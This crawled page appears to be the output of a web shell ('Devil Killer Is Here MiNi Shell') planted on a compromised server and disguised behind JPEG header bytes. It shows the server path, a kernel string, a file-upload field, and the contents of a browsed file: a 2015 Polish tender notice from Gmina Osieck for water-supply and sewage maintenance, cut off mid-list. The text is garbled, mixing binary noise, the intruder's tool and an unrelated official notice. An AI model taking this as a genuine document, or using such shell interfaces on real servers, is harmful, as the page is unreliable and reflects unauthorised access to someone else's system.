JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150102/880-N-2015.html

<p class="kh_header"><b>Osieck: Konserwacja i eksploatacja obiektów i urządzeń stacji uzdatniania wody i sieci wodociągowej oraz oczyszczalni ścieków i sieci kanalizacyjnej, będących w użytkowaniu Gminy Osieck</b><br>
<b>Numer ogłoszenia: 880 - 2015; data zamieszczenia: 02.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy , ul. Rynek 1, 08-445 Osieck, woj. mazowieckie, tel. 025 6857026 w. 14, faks 025 6857090.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.osieck.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja i eksploatacja obiektów i urządzeń stacji uzdatniania wody i sieci wodociągowej oraz oczyszczalni ścieków i sieci kanalizacyjnej, będących w użytkowaniu Gminy Osieck.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postanowienia ogólne
Przedmiotem zamówienia jest
Bezpośrednia eksploatacja urządzeń wodociągowych: dwa ujęcia wody, stacja uzdatniania wody w Osiecku, gminna sieć wodociągowa wraz z pompowniami, przyłącza.
Bezpośrednia eksploatacja urządzeń kanalizacji sanitarnej Oczyszczalnia Ścieków Pogorzel, oczyszczalnia ścieków w Augustówce, sieć kanalizacyjna w Osiecku, Pogorzeli i Grabiance, przepompownie, przyłącza.
Przedmiot zamówienia obejmuje:
Przyjęcie do eksploatacji środków trwałych, obejmujących cały system wodno-kanalizacyjny wraz z oczyszczalnią ścieków i stacją uzdatniania wody w Osiecku.
Przyjęcie do eksploatacji środków trwałych wybudowanych i oddanych do użytkowania w trakcie realizacji umowy wynikającej z niniejszego zamówienia.
Prowadzenie eksploatacji zgodnie z obowiązującymi szczegółowymi przepisami branżowymi, a zwłaszcza z przepisami dotyczącymi gospodarki wodno-ściekowej, w szczególności ustawy o zbiorowym zaopatrzeniu w wodę i zbiorowym odprowadzaniu ścieków, ustawy POŚ, ustawy Prawo Wodne.
Oferent winien posiadać ubezpieczenie od odpowiedzialności cywilnej związanej z prowadzoną działalnością.
Ponoszenie pełnej odpowiedzialności za eksploatację całego systemu i przestrzeganie przepisów o ochronie środowiska, odpowiednich pozwoleń i koncesji, a także przepisów Kodeksu Pracy, BHP i innych.
Zwrot powierzonego mienia, w stanie niepogorszonym, na zakończenie umowy, chyba że zużycie nastąpiło na skutek normalnej eksploatacji. 
Szczegółowy opis przedmiotu zamówienia według Wspólnego Słownika Zamówień 41.11.00.00-3, 65.11.10.00-4, 65.12.00.00-0, 65.13.00.00-3, 90.48.10.00-2,  90.48.00.00-5
Do obowiązków Wykonawcy należeć  będzie:
W ZAKRESIE EKSPLOATACJI I KONSERWACJI ZBIOROWYCH URZĄDZEŃ WODOCIĄGOWYCH:
Bezpośrednia obsługa istniejącej sieci wodociągowej wraz z infrastrukturą i przyłączami. 
Bezpośrednia obsługa ujęcia wody.
STACJA UZDATNIANIA WODY W OSIECKU
Stan prawny: KW 42065 dz.ew. nr 1410/4 i KW SI1G/00038970/4 dz. ew. nr 1409/9
Powierzchnia działki: 0,44 ha
Wydajność max:80 m3/h,1 400 m3/dobę 
Gmina Osieck posiada ponad 80 km wybudowanej sieci wodociągowej magistralnej i rozdzielczej oraz ok. 1 200 szt. przyłączy wodociągowych.     
Produkcja  wody wyjście do sieci po modernizacji SUW zakończonej w styczniu 2014 r., do 30 listopada 2014 r. wyniosła ok. 120 000. m3, a sprzedaż  94 654,3 m3.
całodobowa i bezawaryjna dostawa wody o parametrach dla wody pitnej określonych
w obowiązujących przepisach oraz likwidacja przyczyn i skutków odchyleń jakości wody od obowiązujących norm,
utrzymanie w należytym stanie technicznym, sanitarnym i estetycznym studni głębinowych, stacji uzdatniania wody i pompowni sieciowych, w szczególności bieżąca konserwacja urządzeń i rurociągów, tj. uzupełnianie uszkodzonej armatury i drobnego wyposażenia, czyszczenie urządzeń i rurociągów, bieżąca kontrola stanu technicznego studni głębinowych i stacji uzdatniania wody. 
utrzymanie w należytym stanie technicznym, sanitarnym i estetycznym  urządzeń wodociągowych, w szczególności bieżąca konserwacja urządzeń i rurociągów, tj. uzupełnianie uszkodzonej armatury i drobnego wyposażenia, czyszczenie urządzeń i rurociągów, wymiana uszkodzonych wodomierzy, nawiertek, zasuw, hydrantów,
eksploatacja studni głębinowych i stacji uzdatniania wody zapewniająca pozyskanie wody w odpowiedniej ilości, dla zapewnienia potrzeb odbiorców,
W odniesieniu do SUW wymagana jest codzienna 7 razy w tygodniu wizyta na terenie stacji,sprawdzenie poprawności działania wszystkich urządzeń, wykonanie niezbędnych czynności obsługowych, odnotowanie i zapisanie parametrów produkcji wody.
Przynajmniej 1 raz w miesiącu, w terminie uzgodnionym z Zamawiającym - uruchomienie agregatu prądotwórczego. Paliwo do agregatu zapewnia na bieżąco Wykonawca.    
niezwłoczne usuwanie wszelkich przecieków i nieszczelności na sieci wodociągowej, 
niezwłoczne usuwanie wszelkich awarii i usterek technicznych powstałych na ujęciach wody zakłócających ciągłość dostaw wody i prawidłową eksploatację sieci,
Podjęcie działań w kierunku usunięcia awarii w ciągu  do 2,5 godzin od chwili
zgłoszenia, usunięcie awarii w ciągu 12 godzin. Z chwilą, gdy przerwa w dostawie energii elektrycznej z sieci energetycznej przekracza 4 cztery godziny zasilanie energią elektryczną ujęcia wody, oczyszczalni ścieków z agregatów prądotwórczych.
likwidacja zastoin poprzez płukanie sieci wodociągowej wraz z przyłączami w razie konieczności, na podstawie zgłoszeń Zamawiającego jak również bezpośrednio Odbiorców wody, 
każdorazowe powiadamianie Odbiorców na zasadach przewidzianych w Regulaminie o planowanych przerwach lub ograniczeniach w dostawie wody,
w przypadku przedłużającej się przerwy w dostawie wody, Wykonawca zobowiązany jest zapewnić jej dostawę w inny sposób np. beczkowozy,
kontrola legalności poboru wody, informowanie Zamawiającego o stwierdzonych nieprawidłowościach i usuwanie nielegalnych poborów wody,
kontrola legalności oraz instalowanie nowych lub wymiana legalizacyjna wodomierzy wraz z ich zaplombowaniem wodomierze i plomby Zamawiającego
Wykonawca musi przewidzieć w ofercie koszt planowanej akcji wymiany wodomierzy 100 szt. u Odbiorców, niezależnie od bieżących potrzeb wymiany wodomierzy
wykonanie i prowadzenie ewidencji wszystkich hydrantów przeciwpożarowych na terenie Gminy Osieck oraz ich cyklicznych, systematycznych przeglądów. Zorganizowane przeglądy hydrantów w każdej miejscowości będą się odbywały przynajmniej jeden raz w roku i będą polegały na sprawdzeniu działania zamknięcia i otwarcia samego hydrantu i zasuwy odcinającej hydrant oraz przepłukaniu sieci, do uzyskania widocznej czystości wypływającej wody.
usuwanie awarii wodociągu w zakresie eksploatacji na sieci wodociągowej 
i przyłączach wodociągowych, do pierwszego zaworu za wodomierzem głównym,
bezpośrednie przyjmowanie zgłoszeń od Odbiorców i reagowanie na każde zgłoszenie, w zakresie odpowiedzialności Gminy sieć + przyłącza wraz z zaworem za wodomierzem głównym, 
lokalizacja i odkrywanie zakrytych zasuw odcinających na sieci oraz na przyłączach i  w razie konieczności uzupełnianie brakujących elementów - skrzynek, tabliczek informacyjnych, słupków oznaczeniowych, pokryw betonowych.
W zakresie estetyki wymienionych obiektów SUW, pompownie sieciowe w Grabiance i Czarnowcu należy uwzględnić m.in. wykaszanie trawy na terenie SUW i przepompowni na trasie wodociągu, co najmniej 3 razy w roku, tj. pierwsze do 31 maja, drugie do 31 lipca i trzecie do 30 września, naprawę i konserwację ogrodzenia zewnętrznego, w tym bram i furtek, utrzymanie w czystości i porządku terenu, powierzchni utwardzonych i nieutwardzonych, skarp nasypów.
W ZAKRESIE SIECI KANALIZACYJNEJ I OCZYSZCZALNI ŚCIEKÓW:
OCZYSZCZALNIA ŚCIEKÓW
Stan prawny: KW SI1G/00038969/4 dz. ew. nr 1623, KW SI1G00059179/2 
dz. ew. nr 1625/1    
Powierzchnia działki:ok. 0,4 ha
Przepustowość:
	średniodobowa 150 m3/d
	maksymalna dobowa 200 m3/d
Odbiornikiem ścieków oczyszczonych jest tzw. Kanał Osiecki
bezpośrednia obsługa istniejącej sieci kanalizacji sanitarnej w Gminie Osieck wraz z urządzeniami: długość sieci na dzień ogłoszenia postępowania - kanalizacja sanitarna grawitacyjna w Osiecku DN200 i DN250 PVC 10,15 km, kanalizacja tłoczna DN90 PE w Osiecku 0,68 km, 2 szt. przepompowni ścieków w Osiecku, 232 szt. przyłączy kanalizacyjnych w Osiecku, 
bezpośrednia obsługa zbudowanej w 2009 r. mechaniczno-biologicznej oczyszczalni ścieków Pogorzel, zlokalizowanej w miejscowości Osieck., według opracowanej przez firmę BIO-TECH Sp. z o.o. i załączonej Instrukcji Eksploatacji Oczyszczalni ścieków BIO-PAK typ KBA 100 1000, w tym m.in. codzienna obsługa pompowni ścieków surowych usuwanie skratek z kraty koszowej, czyszczenie pomp, czyszczenie ścian i dna zbiornika, czyszczenie sita bębnowego, opróżnianie rury centralnej w reaktorze, bieżące, codzienne odwadnianie osadu nadmiernego w prasie 6 dni w tygodniu, bez niedzieli, magazynowanie osadu w kontenerach i jego systematyczny wywóz, sprzątanie i utrzymywanie w stałej czystości budynku oczyszczalni: ściany, posadzki, urządzenia,  obiektów i całego terenu w granicach ogrodzenia, likwidacja przyczyn i skutków odchyleń od norm odprowadzanych ścieków.  
W odniesieniu do OŚ Pogorzel wymagana jest codzienna 7 dni w tygodniu wizyta na terenie oczyszczalni, sprawdzenie poprawności działania wszystkich urządzeń, wykonanie niezbędnych czynności obsługowych, odnotowanie i zapisanie parametrów oczyszczania ścieków.
bieżąca eksploatacja oczyszczalni ścieków w Augustówce, zapewniająca uzyskanie parametrów ścieków oczyszczonych zgodnych z pozwoleniem wodnoprawnym: 
BZT5  25 mgO2/l, ChZT  125 mgO2/l , zawiesina ogólna   35 mg/l, oraz likwidacja przyczyn i skutków odchyleń od norm odprowadzanych ścieków. 
właściwe i zgodne z prawem zagospodarowanie odwodnionego na prasie osadu oraz odpadów powstających na oczyszczalniach. Wykonawca jest zobowiązany do bieżącego przekazywania z każdego dokonanego wywozu Karty przekazania odpadu dla powstających w oczyszczalni osadów i odpadów ściekowych.
Karty przekazania odpadu będą wymaganym przez Zamawiającego załącznikiem do wystawianych przez Wykonawcę faktur za realizację usługi. 
Zamawiający zwraca szczególną uwagę, oczekuje od Wykonawcy i będzie egzekwował, zgodną z Instrukcją Eksploatacji Oczyszczalni obsługę obiektu.
Np. w zakresie gospodarki osadowej  codzienną kontrolę stężenia osadu czynnego w komorze osadu czynnego, codzienną kontrolę stężenia tlenu w reaktorze i podejmowanie odpowiednich do wyników kontroli działań. 
całodobowy i bezawaryjny odbiór ścieków od odbiorców indywidualnych i zbiorowych.
bieżąca konserwacja i naprawa urządzeń kanalizacyjnych i wszystkich elementów urządzeń oczyszczalni ścieków, usuwanie awarii i usterek oraz dbałość o stan
techniczny wszystkich elementów oczyszczalni ścieków, sieci kanalizacyjnej, studzienek kanalizacyjnych, oraz przepompowni ścieków.
Podjęcie działań w kierunku usunięcia awarii w ciągu  do 2,5 godzin od chwili zgłoszenia, usunięcie awarii w cg 12 godzin. W przypadku, gdyby czas trwania awarii sieci kanalizacji sanitarnej powodował brak możliwości odbioru ścieków, Wykonawca zapewni ich odbiór wozami asenizacyjnymi.
czyszczenie sieci kanalizacji sanitarnej wraz z przyłączami w razie konieczności.
systematyczne czyszczenie przepompowni ścieków z osadów. 
kontrola legalności zrzutu ścieków i podłączeń do kanalizacji sanitarnej. 
bezzwłoczne usuwanie awarii na obiektach przepompowni ścieków, urządzeń kanalizacji  sanitarnej i oczyszczalni ścieków.
utrzymanie w należytym stanie technicznym, sanitarnym i estetycznym oczyszczalni ścieków i urządzeń kanalizacyjnych, a w szczególności bieżąca konserwacja urządzeń i rurociągów, tj. uzupełnianie wadliwej lub uszkodzonej armatury i wyposażenia, czyszczenie urządzeń i rurociągów, wymiana uszkodzonych studni kanalizacyjnych, włazów ulicznych, bieżąca kontrola stanu technicznego, wykonanie przeglądu okresowego dmuchaw  w roku 2015.
W zakresie estetyki obiektów OŚ Augustówka, OŚ Pogorzel, pompownie ścieków  należy uwzględnić m.in. wykaszanie trawy co najmniej 3 razy w roku, t.j. pierwsze do 31 maja, drugie do 31 lipca i trzecie do 30 września, naprawę i konserwację ogrodzenia zewnętrznego, w tym bram i furtek, utrzymanie w czystości i porządku terenu, powierzchni utwardzonych i nieutwardzonych, skarp nasypów.
Wykonawca musi uwzględnić w ofercie fakt, że w trakcie I kwartału 2015 roku zwiększy się długość sieci kanalizacyjnej, liczba dostawców ścieków mieszkańcy Pogorzeli oraz ilość ścieków dopływających do oczyszczalni. Zakres budowy kanalizacji sanitarnej w systemie grawitacyjno-tłocznym w Pogorzeli wynosi:
Kanalizacja grawitacyjna DN200 PVC 2,1 km,
Kanalizacja tłoczna DN110 PE 2,22 km,
Przepompownia ścieków 1 szt.,
Przyłącza kanalizacyjne ok. 100 szt. 
Kolejna zmiana będzie miała m-ce w drugim kwartale 2015  r. po wybudowaniu sieci i przyłączeniu do zbiorczego systemu kanalizacyjnego w Osiecku mieszkańców Grabianki:
Kanalizacja grawitacyjna DN200 PVC 1,81 km,
Kanalizacja tłoczna DN140 PE 	2,19 km,
Przepompownia ścieków 1 szt.,
Przyłącza kanalizacyjne DN160 PVC	ok. 25szt.
PROWADZENIE DOKUMENTACJI EKSPLOATOWANYCH OBIEKTÓW I URZĄDZEŃ. 
PONADTO  WYKONAWCA ZOBOWIAZANY BĘDZIE DO:
Wyznaczenia i wskazania Zamawiającemu z imienia i nazwiska osoby bezpośrednio wykonującej obowiązki Wykonawcy na terenie Gminy Osieck. Nie należy przez to rozumieć, że Zamawiający wymaga tylko 1 osoby zaangażowanej do realizacji przedmiotu umowy.     
Uczestniczenia w odbiorach sieci wodociągowych i kanalizacyjnych wybudowanych w trakcie realizacji umowy, uczestniczenia w określaniu warunków technicznych planowanych przyłączy oraz wykonywania odbiorów przyłączy kanalizacyjnych i wodociągowych,
Prowadzenia sprawozdawczości zgodnie z obowiązującymi przepisami, w tym m.in. książki eksploatacji obiektów.  
Przyjęcia do eksploatacji nowych odcinków sieci i urządzeń wodno kanalizacyjnych związanych z przedmiotem zamówienia i na zasadach określonych w zamówieniu  w ramach rozbudowy infrastruktury, która odbywać się będzie staraniem i na koszt Właściciela
Przestrzegania zasad dobrych praktyk gospodarczych i ekologicznych, a także dbałości o unikanie konfliktu interesów,
Informowania Inspektora ds. wodociągu i kanalizacji w Gminie Osieck o istotnych okolicznościach realizacji umowy,
Umożliwienia Właścicielowi przeprowadzania kontroli stanu technicznego infrastruktury i przyjmowania wniosków i zaleceń odnoszących się do stanu powierzonego majątku,
Zapewnienia należytego stanu sanitarnego wody zasilającej odbiorców i jakości ścieków odprowadzanych do wód powierzchniowych,
Ponoszenia odpowiedzialności wobec sanitarno-ekologicznych służb państwowych sprawujących nadzór nad prawidłową pracą urządzeń wodno-kanalizacyjnych i oczyszczalni ścieków,
Ponoszenia odpowiedzialności za szkody poniesione w wyniku klęsk żywiołowych, wyładowań atmosferycznych, współdziałanie na rzecz przywrócenia urządzeń do stanu pierwotnego,
Uiszczania opłat i kar związanych z urządzeniami w przypadku przekroczenia norm określonych w właściwych przepisach,
W przypadku prowadzenia robót w pasie drogowym w związku z wykonywaniem prac związanych z urządzeniami wodociągowymi i urządzeniami kanalizacyjnymi, do których utrzymania zgodnie z umową dzierżawy zobowiązany jest Wykonawca, dopełnić obowiązków wynikających z przepisów o drogach publicznych własnym staraniem i na własny koszt.
USŁUGA NIE OBEJMUJE:
Opłat Marszałkowskich.
Opłat z tytułu dozoru technicznego UDT.
Ponoszenia kosztów energii elektrycznej zasilającej urządzenia w oczyszczalniach i pompowniach ścieków oraz w stacji uzdatniania wody i pompowniach na sieci wodociągowej.
Odczytywania stanów wodomierzy, poboru i rozliczania należnych opłat za dostarczoną wodę i wprowadzone ścieki.
Wydawania warunków technicznych przyłączenia do gminnej sieci wodociągowej i
  kanalizacyjnej.
Wykonywania wymaganych badań jakości wody i ścieków.
Kosztów utrzymywania aktywności kart SIM w monitorowanych obiektach - OŚ, SUW, pompowniach.
 Koszt materiałów np. wodomierze, zawory, złączki, plomby..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 41.11.00.00-3, 65.11.10.00-4, 65.12.00.00-0, 65.13.00.00-3, 90.48.10.00-2, 90.48.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie warunków.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz usług wykonanych w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonywał minimum 2 usługi o podobnym charakterze. Usługi ujęte w wykazie muszą być potwierdzone referencjami.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawi sprzęt, który znajduje się w jego posiadaniu na zasadzie własności,najmu,dzierżawy,możliwości wypożyczenia, niezbędny do realizacji przedmiotu zamówienia. Zamawiający wymaga aby oferent przystępujący do niniejszego postępowania posiadał dostęp do w pełni sprawnych jednostek sprzętu: koparko ładowarka kołowa, auto dostawcze posiadające przestrzeń bagażową o dł. co najmniej 2 m i pojemność  co najmniej 3 m3, ciągnik z niezbędnym sprzętem, zestaw kluczy, chwytaki, linki, urządzenie do udrażniania kanalizacji, rozpory zabezpieczające ściany wykopu, sprężarka min. 15 bar, beczkowóz do wody o poj. co najmniej  2 m3, wóz asenizacyjny, beczkowozy do wywozu osadów i odpadów ściekowych załącznik nr 10.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dokona wypisu kadry zatrudnionych przez niego pracowników wraz ze wskazaniem Zamawiającemu z imienia i nazwiska osoby bezpośrednio wykonującej obowiązki Wykonawcy na terenie Gminy Osieck, wraz z podaniem posiadanych kwalifikacji i doświadczenia zawodowego załącznik nr 9. Nie należy przez to rozumieć, że Zamawiający wymaga tylko 1 osoby zaangażowanej do realizacji przedmiotu umowy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie warunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

